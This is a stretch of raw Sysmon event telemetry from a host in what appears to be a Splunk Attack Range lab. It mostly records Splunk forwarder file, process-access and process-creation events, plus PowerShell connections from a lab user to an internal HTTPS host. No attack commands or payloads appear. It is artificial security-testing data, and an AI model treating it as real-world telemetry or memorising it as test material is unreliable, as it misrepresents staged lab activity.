AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50389-false10.0.1.12-8000- 23542300x800000000000000036496272Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:14.796{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBB123AB0CA8FF9498E6CC12DDEC63CB,SHA256=74CDF4FFB7BB638BF0C7CB71D6105F798F9B89901393C16F63E68D83973534FE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496275Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:15.811{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D21CD5A92F8DE9B0729E08341C0318DA,SHA256=A84876F3CCF267DD345ECC409701E122EE6860229277885710653A4A8F954ADD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496274Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:15.143{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E8221794FF9992AD3439156134CE7D7C,SHA256=9DAE5EA706EFFC4FE2D5C8993A8EC831972B171DA858404D08F0D7C509E09852,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496277Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:45.808{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50390-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496276Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:16.826{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=833103081EC774D0FBE113E396954139,SHA256=74DDE1EBBC2884E500264D57989E7AACBF168E803E2C679657F6CE45ED88CFC7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496278Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:17.841{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AC9BF08458C334E5EB5D0041F29FBB3,SHA256=B8618081B94FCBBB10645DAF0830475E7D45E788DE73533E67D8615FFA9769AB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496279Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:18.888{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5923E406D52F1999128C68BCC85D3C46,SHA256=F77BC5E227D461EE9A0A60F5793A0B985573A5DCDD7C71B0060ABBFCEF384DC7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496280Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:19.891{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3645CDEF0DBA2DD1D9590ABB78A586BE,SHA256=011046FF3483AF7994A159892CA376E86E680C3DF4B7BCB36A6E8B540DE43314,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496282Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:20.908{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D9D90C43AA9E99F8E9C72975C5F5DB1,SHA256=71BB709CC8FBD10EF1C9472A979CA78ED07CFF3B05C9B607A76081F35BB6168C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496281Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:20.175{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=EE312C0CE1813420D2D05DA187869C15,SHA256=87D641502F9186C4FB2662A279655356B2EDE385956A124F88EEFACE69A2AFD3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496285Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:21.939{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCA30B3B2D8DA4ECEA47FAB5D4B7CF8D,SHA256=DC130DE88B5200DA63E5F2C1858E3BDFC0C44992AB3ECBE8D722953B7D508346,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496284Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:50.834{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50392-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000036496283Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:50.765{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50391-false10.0.1.12-8000- 23542300x800000000000000036496286Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:22.969{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=325132C7F4E7DDF42C4A0982A40EBE68,SHA256=202B5459E49DCAA93E8CFA04DC9CCA87DF4159F6ADDFBB6198F77E2FFB86259B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496288Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:23.987{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F648B4B78C0E0B90187D55CA79897FC,SHA256=08981DCB9CB1B01449605DF5A68283AEA9309C774504000AF2AE1872378BC42B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496287Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:23.206{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=8986BBB726E2C7D9691149357A294718,SHA256=9D76E0BCCB2AF491FB41C25DC736AE1DB2DB4ECA329143CE30B05EAA81A4D886,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496304Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:24.936{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9F7C-6140-5556-04000000C801}4664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496303Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:24.936{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496302Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:24.936{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496301Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:24.936{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496300Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:24.936{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496299Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:24.936{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-9F7C-6140-5556-04000000C801}4664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496298Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:24.936{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-9F7C-6140-5556-04000000C801}4664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496297Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:24.921{B81B27B7-9F7C-6140-5556-04000000C801}4664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000036496296Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:24.252{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9F7C-6140-5456-04000000C801}5056C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496295Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:24.252{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496294Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:24.252{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496293Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:24.252{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496292Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:24.252{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496291Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:24.252{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-9F7C-6140-5456-04000000C801}5056C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496290Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:24.252{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-9F7C-6140-5456-04000000C801}5056C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496289Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:24.237{B81B27B7-9F7C-6140-5456-04000000C801}5056C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036496308Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:25.467{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=63BAAD576212EF1B67F6C699B83C66A2,SHA256=D1ECB69DE231408B9A26282A05A523048A97D81986DFAD696835DB6D17F830ED,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496307Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:25.467{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9A02034E5C3DA78A8B1145384E72CD0C,SHA256=A262965FDB8467AE96129E6E59C1555BBF5FA1CDC27423647E3C6A3590AD2C06,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496306Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:25.089{B81B27B7-9F7C-6140-5556-04000000C801}46642776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036496305Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:25.005{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEF20A7470B138AFBC3807039DB80F34,SHA256=D37011927AA27F45F3F49354F5BEBFB787DC76261252B161986E2419DE75AF32,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496310Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:26.252{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=53B566D5924140D9B2EE95A264E1514A,SHA256=CADEB662D83A66099DCF80E11671DC5645863DF1F75EF5F5DCF81E378CF7FBCE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496309Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:26.021{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9C7914461E0C408FF85DA02688E38FD,SHA256=78D0C3E40B10FFA92DA58A118423EF81B9C61B35E8D589DD9836CBBDC722E1D4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 